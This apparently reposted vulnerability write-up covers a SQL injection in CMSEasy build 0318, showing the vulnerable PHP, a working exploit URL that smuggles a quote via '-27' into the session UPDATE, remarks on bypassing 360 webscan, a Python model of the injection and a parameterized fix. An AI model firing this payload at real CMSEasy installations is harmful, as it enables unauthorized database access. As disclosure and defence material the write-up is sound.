The latest cmseasy Injection

Source: Internet
Author: User

Unfortunately this does not bypass 360 webscan (although that is, in fact, easy to do).

The latest CMSEasy release (build 0318) contains an injection.


Vulnerable file: /lib/default/archive_act.php

Around line 250:

function search_action() {
    //print_r($_SESSION);exit();
    if (front::get('ule')) {
        front::$get['keyword'] = str_replace('-', '%', front::$get['keyword']);
        front::$get['keyword'] = urldecode(front::$get['keyword']);
    }
    if (front::get('keyword') && !front::post('keyword'))
        front::$post['keyword'] = front::get('keyword');
    front::check_type(front::post('keyword'), 'safe');
    if (front::post('keyword')) {
        $this->view->keyword = trim(front::post('keyword'));
        session::set('keyword', trim(front::post('keyword')));
        /*
        if (isset(front::$get['keyword']))
            front::redirect(preg_replace('/keyword=[^&]+/', 'keyword=' . urlencode($this->view->keyword), front::$uri));
        else
            front::redirect(front::$uri . '&keyword=' . urlencode($this->view->keyword));
        */
    } else {
        $this->view->keyword = session::get('keyword');
    }
    if (preg_match('/union/i', $this->view->keyword) || preg_match('/"/i', $this->view->keyword) || preg_match('/\'/i', $this->view->keyword)) {
        exit('invalid parameter');
    }
    // ... (rest of search_action not shown on the page)
}





The important part:

if (front::get('ule')) {
    front::$get['keyword'] = str_replace('-', '%', front::$get['keyword']);
    front::$get['keyword'] = urldecode(front::$get['keyword']);
}



Sending any non-empty ule GET parameter is enough to enter this branch.

Inside it every '-' in keyword is replaced with '%', and the result is then urldecoded.

As a result a single quote can be introduced directly: passing -27 becomes %27 after the replacement and ' after urldecode, without a quote or a %27 ever appearing in the request.



Next, the keyword is written into the session:

session::set('keyword', trim(front::post('keyword')));





The corresponding session class:

class session {
    static function get($key) {
        if (isset($_SESSION[$key]))
            return $_SESSION[$key];
        else
            return false;
    }
    static function set($key, $var) {
        $_SESSION[$key] = $var;
    }
    static function del($key) {
        unset($_SESSION[$key]);
    }
}
//session_start();





CMSEasy stores sessions in the database, so after the session value is assigned a write operation follows. The handler lives in /lib/plugins/stsession.php:

public function write($id, $data) {
    $sql = "SELECT * FROM {$this->_prefix}sessionox where PHPSESSID = '$id'";
    //var_dump($sql);
    $res = $this->_db->query($sql);
    $time = time();
    $row = $this->_db->fetch_array($res);
    if ($row) {
        //if ($row['data'] != $data) {
        $sql = "UPDATE {$this->_prefix}sessionox SET update_time='$time',data='$data' WHERE PHPSESSID = '$id'";
        $this->_db->query($sql);
        //}
    } else {
        if (!empty($data)) {
            $sql = "INSERT INTO {$this->_prefix}sessionox (PHPSESSID, update_time, client_ip, data) VALUES ('$id','$time','$this->_ip','$data')";
            $this->_db->query($sql);
        }
    }
    return true;
}



$data (the serialized session, which now contains the attacker's keyword) is interpolated into the UPDATE statement without escaping, so the single quote smuggled in via -27 closes the data='...' literal and the rest of the keyword is executed as SQL.



The preg_match filter that follows comes after session::set() and therefore has no effect on the injection: the session value is already assigned, and the handler's write() runs when PHP closes the session at the end of the request, which exit('invalid parameter') does not prevent.

if (preg_match('/union/i', $this->view->keyword) || preg_match('/"/i', $this->view->keyword) || preg_match('/\'/i', $this->view->keyword)) {
    exit('invalid parameter');
}





The interception whitelist has also been changed, so it can no longer be used to bypass 360 webscan:

/**
 * Whitelist of directories excluded from interception
 */
function webscan_white($webscan_white_name, $webscan_white_url = array()) {
    $url_path = $_SERVER['SCRIPT_NAME'];
    $url_var = '';
    foreach ($_GET as $key => $value) {
        $url_var .= $key . "=" . $value . "&";
    }
    if (preg_match("/" . $webscan_white_name . "/is", $url_path) == 1 && !empty($webscan_white_name)) {
        return false;
    }
    foreach ($webscan_white_url as $key => $value) {
        if (!empty($url_var) && !empty($value)) {
            if (stristr($url_path, $key) && stristr($url_var, $value)) {
                return false;
            }
        } elseif (empty($url_var) && empty($value)) {
            if (stristr($url_path, $key)) {
                return false;
            }
        }
    }
    return true;
}

 

Verifying the injection:

http://127.0.0.1/cmseasy/index.php?case=archive&act=search&keyword=-27, client_ip = user()-23 &ule=1

After the '-' to '%' rewrite and urldecode, -27 has become ' and -23 has become #, so the keyword stored in the session is ', client_ip = user()# and the UPDATE built by write() is cut short at that point.
An attacker can thus bypass 360webscan and perform blind injection directly.
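To make the chain concrete, here is an added Python model (not code from the page or from CMSEasy) of the three steps described above: the '-' to '%' rewrite followed by urldecode, PHP's default serialization of the keyword into the session data, and the unescaped UPDATE built by write(), run against a constructed in-memory SQLite sessionox table. SQLite has neither '#' comments nor user(), so the constructed payload spells the comment as -2d-2d (which decodes to --) and probes sqlite_version(); on MySQL the page's -23 / user() form applies. The table prefix, session ids and addresses are assumptions, and the model takes the UPDATE branch, i.e. the session row already exists. A parameterized version of the same UPDATE is included to show what the fix looks like.

```python
import sqlite3
from urllib.parse import unquote

PREFIX = "cmseasy_"                     # assumed table prefix
PROBE_RESULT = sqlite3.sqlite_version   # what the injected sqlite_version() yields


def cmseasy_keyword(raw, ule=True):
    """Model of the ule branch of search_action() in archive_act.php.

    PHP decodes the query string once before the code sees it; this branch
    then turns every '-' into '%' and decodes again, so a request that
    carries no quote at all ('-27') yields one.  Without ule the keyword
    is only trimmed.
    """
    if ule:
        raw = unquote(raw.replace("-", "%"))
    return raw.strip()


def php_session_serialize(key, value):
    """PHP's default session serializer for one string entry: key|s:N:"v";"""
    return f'{key}|s:{len(value.encode())}:"{value}";'


def vulnerable_write_sql(sid, ts, data):
    """The UPDATE that stsession.php write() builds: $data goes in verbatim."""
    return (f"UPDATE {PREFIX}sessionox SET update_time='{ts}',data='{data}' "
            f"WHERE PHPSESSID = '{sid}'")


def hardened_write(conn, sid, ts, data):
    """The same UPDATE with bound parameters: a quote in data stays data."""
    conn.execute(
        f"UPDATE {PREFIX}sessionox SET update_time=?, data=? WHERE PHPSESSID = ?",
        (ts, data, sid),
    )


def fresh_db():
    """Constructed sessionox table holding two existing sessions."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE {PREFIX}sessionox (PHPSESSID TEXT PRIMARY KEY, "
                 "update_time INTEGER, client_ip TEXT, data TEXT)")
    conn.executemany(
        f"INSERT INTO {PREFIX}sessionox VALUES (?, ?, ?, ?)",
        [("attacker-sid", 1, "10.0.0.5", ""), ("victim-sid", 1, "10.0.0.9", "")],
    )
    return conn


# Constructed GET value.  The page's MySQL payload is
#   keyword=-27, client_ip = user()-23      (-23 decodes to '#')
# SQLite has no '#' comment and no user(), so the comment is spelled
# -2d-2d (decodes to '--') and sqlite_version() is the probe.
PAYLOAD = "-27, client_ip=sqlite_version()-2d-2d"


def select_all(conn):
    return conn.execute(f"SELECT PHPSESSID, client_ip, data FROM {PREFIX}sessionox "
                        "ORDER BY PHPSESSID").fetchall()


def run_vulnerable(payload=PAYLOAD, sid="attacker-sid"):
    """Store the keyword the way CMSEasy does and return (sql, rows)."""
    conn = fresh_db()
    data = php_session_serialize("keyword", cmseasy_keyword(payload))
    sql = vulnerable_write_sql(sid, 1700000000, data)
    # The quote that came from -27 closes data='...' early; everything after
    # the comment marker, including the WHERE clause, is dropped, so every
    # session row gets client_ip = sqlite_version().
    conn.execute(sql)
    return sql, select_all(conn)


def run_hardened(payload=PAYLOAD, sid="attacker-sid"):
    """Same payload through the parameterized UPDATE: only the caller's row
    changes and the serialized keyword is stored verbatim."""
    conn = fresh_db()
    data = php_session_serialize("keyword", cmseasy_keyword(payload))
    hardened_write(conn, sid, 1700000000, data)
    return select_all(conn)


if __name__ == "__main__":
    sql, rows = run_vulnerable()
    print(sql)
    for row in rows:
        print("vulnerable:", row)
    for row in run_hardened():
        print("hardened:  ", row)
```

Running the block prints the spliced UPDATE, then the table after the vulnerable write (both rows carry the probe value in client_ip and a truncated data column) and after the hardened write (only attacker-sid changed, and its data column holds the full serialized keyword, quote included).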

Solution:

Filter the input properly: drop the '-' to '%' rewrite in search_action() (or validate the keyword only after it has been decoded, and before it is stored in the session), and in stsession.php write() escape $data or bind it as a query parameter instead of interpolating it into the SQL string.
 
